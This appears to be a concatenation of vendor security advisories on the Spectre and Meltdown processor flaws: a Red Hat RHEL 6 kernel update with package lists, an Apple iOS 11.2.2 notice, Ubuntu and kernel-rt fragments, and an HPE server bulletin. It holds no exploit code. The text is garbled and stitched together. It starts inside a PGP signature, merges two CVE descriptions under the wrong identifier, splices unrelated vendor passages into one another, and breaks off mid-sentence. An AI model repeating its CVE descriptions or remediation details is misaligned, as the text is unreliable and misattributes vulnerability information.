SIGNATURE-----\n\niQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlron61fFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2\nNDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND\nz0Rtqw//Xf/L4bP65wU9M59Ef6xBt+Eph+yxeMsioGhu80ODdMemlmHzASMtfZjY\nAXxyt9l8lbHn8MmwDA4aLhhwHYXwvKATdpHSy1SILrRfb4s9P9uV1vsHaIeZ649E\nhDyNon9hP2tPso6BwqiYHZZy9Xxtd+T8vTBeBZwUKOLBkBRvV/gyNSUdJWp6L8WH\naF4D1hHl9ZotDkyIvkubbx77aqbJ88I4R0n69x7L9udFbuXa+U7hV6dJdnpzyl/7\nOukJfEtnkaUgWu0MdOfFss6iH5OQISn/y/ricRi29oKQiEp3YwnT5J9pFwSQeJJS\nH8ABVt251UoS0J+of3QWw0muOT/6UAF8SNpPKMJXC7Euq8pTmYVPSIeUYf4eqn65\nUHZSCKXaszItq+uzVNYdkj504BJ4cG1lFxZtlrFWwKE8p7QOETN0GKvTRdu/SvDd\nHl2nb4HouLpBYS518Th2/MGgzhXXAuO12MH3smenptZbqxKn9Z0XSTJYzFupgJk/\nkKF2xkDFBE4toTLVE+6XdUKwYk4vkeDZyOGOwRYThSkKAzrUh5zThgal4HnknD2A\n5ye4XLhjgSIT47/nmor6lhxd7WGXGkV33GF0azYlHr/sclfzxcU2Ev3NUBWQ8M3s\nCxfIO0FNCzO0WIUf40md7MlIAnDBIRGyYgNIIe7AnSRKKPykEx8=\n=wNQS\n-----END PGP SIGNATURE-----\n. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. \n\nSecurity Fix(es):\n\nAn industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of instructions (a commonly\nused performance optimization). There are three primary variants of the\nissue which differ in the way the speculative execution can be exploited. \n\nNote: This issue is present in hardware and cannot be fully fixed via\nsoftware update. The updated kernel packages provide software mitigation\nfor this hardware issue at a cost of potential performance penalty. Please\nrefer to References section for further information about this issue and\nthe performance impact. \n\nIn this update mitigations for x86-64 architecture are provided. \n\nVariant CVE-2017-5753 triggers the speculative execution by performing a\nbounds-check bypass. It relies on the presence of a precisely-defined\ninstruction sequence in the privileged code as well as the fact that memory\naccesses may cause allocation into the microprocessor\u0027s data cache even for\nspeculatively executed instructions that never actually commit (retire). As\na result, an unprivileged attacker could use this flaw to cross the syscall\nboundary and read privileged memory by conducting targeted cache\nside-channel attacks. It relies on the presence of a precisely-defined\ninstruction sequence in the privileged code as well as the fact that memory\naccesses may cause allocation into the microprocessor\u0027s data cache even for\nspeculatively executed instructions that never actually commit (retire). As\na result, an unprivileged attacker could use this flaw to cross the syscall\nand guest/host boundaries and read privileged memory by conducting targeted\ncache side-channel attacks. (CVE-2017-5715, Important)\n\nVariant CVE-2017-5754 relies on the fact that, on impacted microprocessors,\nduring speculative execution of instruction permission faults, exception\ngeneration triggered by a faulting access is suppressed until the\nretirement of the whole instruction block. In a combination with the fact\nthat memory accesses may populate the cache even when the block is being\ndropped and never committed (executed), an unprivileged local attacker\ncould use this flaw to read privileged (kernel space) memory by conducting\ntargeted cache side-channel attacks. (CVE-2017-5754, Important)\n\nNote: CVE-2017-5754 affects Intel x86-64 microprocessors. AMD x86-64\nmicroprocessors are not affected by this issue. \n\nRed Hat would like to thank Google Project Zero for reporting these issues. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1519778 - CVE-2017-5753 hw: cpu: speculative execution bounds-check bypass\n1519780 - CVE-2017-5715 hw: cpu: speculative execution branch target injection\n1519781 - CVE-2017-5754 hw: cpu: speculative execution permission faults handling\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nkernel-2.6.32-696.18.7.el6.src.rpm\n\ni386:\nkernel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-headers-2.6.32-696.18.7.el6.i686.rpm\nperf-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm\nkernel-doc-2.6.32-696.18.7.el6.noarch.rpm\nkernel-firmware-2.6.32-696.18.7.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-headers-2.6.32-696.18.7.el6.x86_64.rpm\nperf-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nkernel-2.6.32-696.18.7.el6.src.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm\nkernel-doc-2.6.32-696.18.7.el6.noarch.rpm\nkernel-firmware-2.6.32-696.18.7.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-headers-2.6.32-696.18.7.el6.x86_64.rpm\nperf-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nkernel-2.6.32-696.18.7.el6.src.rpm\n\ni386:\nkernel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-headers-2.6.32-696.18.7.el6.i686.rpm\nperf-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm\nkernel-doc-2.6.32-696.18.7.el6.noarch.rpm\nkernel-firmware-2.6.32-696.18.7.el6.noarch.rpm\n\nppc64:\nkernel-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-bootwrapper-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debug-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-devel-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-headers-2.6.32-696.18.7.el6.ppc64.rpm\nperf-2.6.32-696.18.7.el6.ppc64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\n\ns390x:\nkernel-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debug-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-696.18.7.el6.s390x.rpm\nkernel-devel-2.6.32-696.18.7.el6.s390x.rpm\nkernel-headers-2.6.32-696.18.7.el6.s390x.rpm\nkernel-kdump-2.6.32-696.18.7.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-kdump-devel-2.6.32-696.18.7.el6.s390x.rpm\nperf-2.6.32-696.18.7.el6.s390x.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\n\nx86_64:\nkernel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-headers-2.6.32-696.18.7.el6.x86_64.rpm\nperf-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nppc64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-696.18.7.el6.ppc64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\npython-perf-2.6.32-696.18.7.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\n\ns390x:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-696.18.7.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\npython-perf-2.6.32-696.18.7.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nkernel-2.6.32-696.18.7.el6.src.rpm\n\ni386:\nkernel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-headers-2.6.32-696.18.7.el6.i686.rpm\nperf-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm\nkernel-doc-2.6.32-696.18.7.el6.noarch.rpm\nkernel-firmware-2.6.32-696.18.7.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-headers-2.6.32-696.18.7.el6.x86_64.rpm\nperf-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/security/vulnerabilities/speculativeexecution\nhttps://access.redhat.com/security/cve/CVE-2017-5753\nhttps://access.redhat.com/security/cve/CVE-2017-5715\nhttps://access.redhat.com/security/cve/CVE-2017-5754\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2018 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFaTXwuXlSAg2UNWIIRAp3LAKCNdSqjVu7zsXcUTnpGuuQAuUlTpwCfTE/O\nOR+iGnoY+cALbsBWKwbmzQM=\n=V4ow\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2018-1-8-1 iOS 11.2.2\n\niOS 11.2.2 is now available and and addresses the following:\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod\ntouch 6th generation\nDescription: iOS 11.2.2 includes security improvements to Safari and\nWebKit to mitigate the effects of Spectre (CVE-2017-5753 and\nCVE-2017-5715). Make sure you have an\nInternet connection and have installed the latest version of iTunes\nfrom https://www.apple.com/itunes/\n\niTunes and Software Update on the device will automatically check\nApple\u0027s update server on its weekly schedule. When an update is\ndetected, it is downloaded and the option to be installed is\npresented to the user when the iOS device is docked. We recommend\napplying the update immediately if possible. Selecting Don\u0027t Install\nwill present the option the next time you connect your iOS device. \n\nThe automatic update process may take up to a week depending on the\nday that iTunes or the device checks for updates. You may manually\nobtain the update via the Check for Updates button within iTunes, or\nthe Software Update on your device. \n\nTo check that the iPhone, iPod touch, or iPad has been updated:\n\n* Navigate to Settings\n* Select General\n* Select About. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03805en_us\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: hpesbhf03805en_us\nVersion: 7\n\nHPESBHF03805 rev.7 - Certain HPE products using Microprocessors from Intel,\nAMD, and ARM, with Speculative Execution, Elevation of Privilege and\nInformation Disclosure. \n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2018-01-23\nLast Updated: 2018-01-22\n\nPotential Security Impact: Local: Disclosure of Information, Elevation of\nPrivilege\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nOn January 3 2018, side-channel security vulnerabilities involving\nspeculative execution were publicly disclosed. These vulnerabilities may\nimpact the listed HPE products, potentially leading to information disclosure\nand elevation of privilege. Mitigation and resolution of these\nvulnerabilities may call for both an operating system update, provided by the\nOS vendor, and a system ROM update from HPE. \n\n\n**Note:**\n\n * This issue takes advantage of techniques commonly used in many modern\nprocessor architectures. \n * For further information, microprocessor vendors have provided security\nadvisories:\n \n - Intel:\n\u003chttps://security-center.intel.com/advisory.aspx?intelid=intel-sa-00088\u0026langu\ngeid=en-fr\u003e\n - AMD: \u003chttp://www.amd.com/en/corporate/speculative-execution\u003e\n - ARM: \u003chttps://developer.arm.com/support/security-update\u003e\n\nReferences:\n\n - CVE-2017-5715 - aka Spectre, branch target injection\n - CVE-2017-5753 - aka Spectre, bounds check bypass\n - CVE-2017-5754 - aka Meltdown, rogue data cache load, memory access\npermission check performed after kernel memory read\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n - HPE ProLiant DL380 Gen10 Server - To be delivered\n - HPE ProLiant DL180 Gen10 Server - To be delivered\n - HPE ProLiant DL160 Gen10 Server - To be delivered\n - HPE ProLiant DL360 Gen10 Server - To be delivered\n - HPE ProLiant ML110 Gen10 Server - To be delivered\n - HPE ProLiant DL580 Gen10 Server - To be delivered\n - HPE ProLiant DL560 Gen10 Server - To be delivered\n - HPE ProLiant DL120 Gen10 Server - To be delivered\n - HPE ProLiant ML350 Gen10 Server - To be delivered\n - HPE ProLiant XL450 Gen10 Server - To be delivered\n - HPE Synergy 660 Gen10 Compute Module - To be delivered\n - HPE ProLiant DL385 Gen10 Server - prior to v1.04 \n - HPE ProLiant XL170r Gen10 Server - To be delivered\n - HPE ProLiant BL460c Gen10 Server Blade - To be delivered\n - HPE ProLiant XL190r Gen10 Server - To be delivered\n - HPE ProLiant XL230k Gen10 Server - To be delivered\n - HPE Synergy 480 Gen10 Compute Module - To be delivered\n - HPE ProLiant XL730f Gen9 Server - To be delivered\n - HPE ProLiant XL230a Gen9 Server - To be delivered\n - HPE ProLiant XL740f Gen9 Server - To be delivered\n - HPE ProLiant XL750f Gen9 Server - To be delivered\n - HPE ProLiant XL170r Gen9 Server - To be delivered\n - HP ProLiant DL60 Gen9 Server - To be delivered\n - HP ProLiant DL160 Gen9 Server - To be delivered\n - HPE ProLiant DL360 Gen9 Server - To be delivered\n - HP ProLiant DL380 Gen9 Server - To be delivered\n - HPE ProLiant XL450 Gen9 Server - To be delivered\n - HPE Apollo 4200 Gen9 Server - To be delivered\n - HP ProLiant BL460c Gen9 Server Blade - To be delivered\n - HP ProLiant ML110 Gen9 Server - To be delivered\n - HP ProLiant ML150 Gen9 Server - To be delivered\n - HPE ProLiant ML350 Gen9 Server - To be delivered\n - HP ProLiant DL120 Gen9 Server - To be delivered\n - HPE ProLiant DL560 Gen9 Server - To be delivered\n - HP ProLiant BL660c Gen9 Server - To be delivered\n - HPE ProLiant ML30 Gen9 Server - To be delivered\n - HPE ProLiant XL170r Gen10 Server - To be delivered\n - HPE ProLiant DL20 Gen9 Server - To be delivered\n - HPE Synergy 660 Gen9 Compute Module - To be delivered\n - HPE Synergy 480 Gen9 Compute Module - To be delivered\n - HPE ProLiant XL250a Gen9 Server - To be delivered\n - HPE ProLiant XL190r Gen9 Server - To be delivered\n - HP ProLiant DL80 Gen9 Server - To be delivered\n - HPE ProLiant DL180 Gen9 Server - To be delivered\n - HPE ProLiant XL270d Gen9 Accelerator Tray 2U Configure-to-order Server -\nTo be delivered\n - HPE ProLiant WS460c Gen9 Workstation - To be delivered\n - HPE ProLiant XL260a Gen9 Server - To be delivered\n - HPE Synergy 620 Gen9 Compute Module - To be delivered\n - HPE ProLiant DL580 Gen9 Server - To be delivered\n - HP ProLiant XL220a Gen8 v2 Server - To be delivered\n - HPE Synergy 680 Gen9 Compute Module - To be delivered\n - HPE ProLiant m510 Server Cartridge - To be delivered\n - HPE ProLiant m710p Server Cartridge - To be delivered\n - HPE ProLiant m710x Server Cartridge - To be delivered\n - HP ProLiant m710 Server Cartridge - To be delivered\n - HP ProLiant DL980 G7 Server - To be delivered\n - HPE Synergy Composer - To be delivered\n - HPE ProLiant Thin Micro TM200 Server - To be delivered\n - HPE ProLiant ML10 v2 Server - To be delivered\n - HPE ProLiant m350 Server Cartridge - To be delivered\n - HPE ProLiant m300 Server Cartridge - To be delivered\n - HPE ProLiant MicroServer Gen8 - To be delivered\n - HPE ProLiant ML310e Gen8 v2 Server - To be delivered\n - HPE Superdome Flex Server - To be delivered\n - HP 3PAR StoreServ File Controller - To be delivered - v3 impacted\n - HPE StoreVirtual 3000 File Controller - To be delivered\n - HPE StoreEasy 1450 Storage - To be delivered\n - HPE StoreEasy 1550 Storage - To be delivered\n - HPE StoreEasy 1650 Storage - To be delivered\n - HPE StoreEasy 3850 Gateway Storage - To be delivered\n - HPE StoreEasy 1850 Storage - To be delivered\n - HP ConvergedSystem 700 - To be delivered\n - HPE Converged Architecture 700 - To be delivered\n - HP ProLiant DL580 Gen8 Server - To be delivered\n - HPE Cloudline CL2100 Gen10 Server - To be delivered\n - HPE Cloudline CL2200 Gen10 Server - To be delivered\n - HPE Cloudline CL3150 G4 Server - To be delivered\n - HPE Cloudline CL5200 G3 Server - To be delivered\n - HPE Cloudline CL3100 G3 Server - To be delivered\n - HPE Cloudline CL2100 G3 807S 8 SFF Configure-to-order Server - To be\ndelivered\n - HPE Cloudline CL2100 G3 407S 4 LFF Configure-to-order Server - To be\ndelivered\n - HPE Cloudline CL2100 G3 806R 8SFF Configure-to-order Server - To be\ndelivered\n - HPE Cloudline CL2200 G3 1211R 12 LFF Configure-to-order Server - To be\ndelivered\n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2017-5715\n 8.2 CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N\n 6.8 (AV:A/AC:L/Au:N/C:C/I:P/A:N)\n\n CVE-2017-5753\n 5.0 CVSS:3.0/AV:A/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L\n 5.4 (AV:A/AC:M/Au:N/C:P/I:P/A:P)\n\n CVE-2017-5754\n 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nOn January 11, Intel announced issues with an increased frequency of reboots\nwhen using the microcodes they released to address Variant 2 of the Spectre\nVulnerability for numerous processors including Broadwell, Haswell, Skylake,\nKaby Lake, Ivybridge, and Sandybridge processors. Intel has now identified\nthe root cause of these issues and determined that these microcodes may\nintroduce reboots and other unpredictable system behavior. Due to the\nseverity of the potential issues that may occur when using these microcodes,\nIntel is now recommending that customers discontinue their use. Additional\ninformation is available from Intels Security Exploit Newsroom here:\n\u003chttps://newsroom.intel.com/press-kits/security-exploits-intel-products/\u003e . \nHPE is in alignment with Intel in our recommendation that customers\ndiscontinue use of System ROMs including impacted microcodes and revert to\nearlier System ROM versions. \n\nAll System ROMs including impacted microcodes have been removed from the HPE\nSupport Site. This impacts HPE ProLiant and Synergy Gen10, Gen9, and Gen8 v2\nservers as well as HPE Superdome servers for which updated System ROMs had\npreviously been made available. Intel is working on updated microcodes to\naddress these issues, and HPE will validate updated System ROMs including\nthese microcodes and 